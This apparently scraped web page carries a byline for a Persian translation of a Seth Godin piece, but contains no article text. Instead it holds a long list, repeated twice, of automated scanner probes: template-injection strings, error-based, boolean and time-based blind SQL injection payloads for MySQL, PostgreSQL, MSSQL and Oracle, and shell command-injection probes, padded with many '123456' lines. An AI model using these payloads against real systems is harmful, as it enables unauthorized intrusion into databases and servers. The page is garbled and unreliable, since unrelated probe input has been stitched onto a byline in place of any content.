By Seth Godin
نوشته: ست گودین
ترجمه: دکتر پرستو معین الدینی
123456
/*1*/{{922327291+816629374}}
${873085409+979239649}
${(940606484+822657028)?c}
${@var_dump(md5(314340370))};
#set($c=933976749+934900862)${c}$c
'-var_dump(md5(908612351))-'
${959079265+989258133}
<%- 931737609+877996573 %>
123456/**/and+3=3
123456/**/and+2=8
123456'and'g'='g
123456'and'w'='f
123456"and"k"="k
123456"and"o"="x
123456'and/**/extractvalue(1,concat(char(126),md5(1587738811)))and'
123456expr 955600554 + 843764117
123456"and/**/extractvalue(1,concat(char(126),md5(1313737288)))and"
123456|expr 878808892 + 942029788
(select*from(select+sleep(0)union/**/select+1)a)
extractvalue(1,concat(char(126),md5(1378481684)))
123456$(expr 926841485 + 811294227)
(select*from(select+sleep(10)union/**/select+1)a)
123456'and(select'1'from/**/cast(md5(1563504199)as/**/int))>'0
123456&set /A 967296554+909987180
123456/**/and/**/cast(md5('1963286028')as/**/int)>0
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
expr 854292488 + 827235350
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1866404105')))
123456'and(select*from(select+sleep(10))a/**/union/**/select+1)='
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1130624677')))>'0
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456鎈'"\(
123456"and(select*from(select+sleep(10))a/**/union/**/select+1)="
123456'"\(
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(10))>0/**/
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(10))::text>'0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:10'/**/
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456'and(select+1)>0waitfor/**/delay'0:0:10
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('o',0)
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('k',10)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
123456
123456
123456
123456
123456
/*1*/{{922327291+816629374}}
123456
123456
123456
${873085409+979239649}
123456
123456
123456
123456
123456
${(940606484+822657028)?c}
${@var_dump(md5(314340370))};
123456
123456
123456
123456
#set($c=933976749+934900862)${c}$c
123456
'-var_dump(md5(908612351))-'
123456
123456
${959079265+989258133}
123456
<%- 931737609+877996573 %>
123456/**/and+3=3
123456
123456
123456
123456
123456/**/and+2=8
123456
123456
123456'and'g'='g
123456
123456
123456'and'w'='f
123456
123456
123456
123456"and"k"="k
123456
123456
123456
123456"and"o"="x
123456
123456
123456
123456
123456
123456
123456
123456'and/**/extractvalue(1,concat(char(126),md5(1587738811)))and'
123456
expr 955600554 + 843764117
123456
123456"and/**/extractvalue(1,concat(char(126),md5(1313737288)))and"
123456|expr 878808892 + 942029788
(select*from(select+sleep(0)union/**/select+1)a)
extractvalue(1,concat(char(126),md5(1378481684)))
123456
123456$(expr 926841485 + 811294227)
(select*from(select+sleep(10)union/**/select+1)a)
123456'and(select'1'from/**/cast(md5(1563504199)as/**/int))>'0
123456
123456&set /A 967296554+909987180
123456/**/and/**/cast(md5('1963286028')as/**/int)>0
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
expr 854292488 + 827235350
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1866404105')))
123456
123456'and(select*from(select+sleep(10))a/**/union/**/select+1)='
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1130624677')))>'0
123456
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456鎈'"\(
123456"and(select*from(select+sleep(10))a/**/union/**/select+1)="
123456'"\(
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(10))>0/**/
123456
123456
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456
123456'/**/and(select'1'from/**/pg_sleep(10))::text>'0
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456
123456
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:10'/**/
123456
123456
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456
123456
123456
123456'and(select+1)>0waitfor/**/delay'0:0:10
123456
123456
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('o',0)
123456
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('k',10)
123456
123456
123456
123456
123456
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456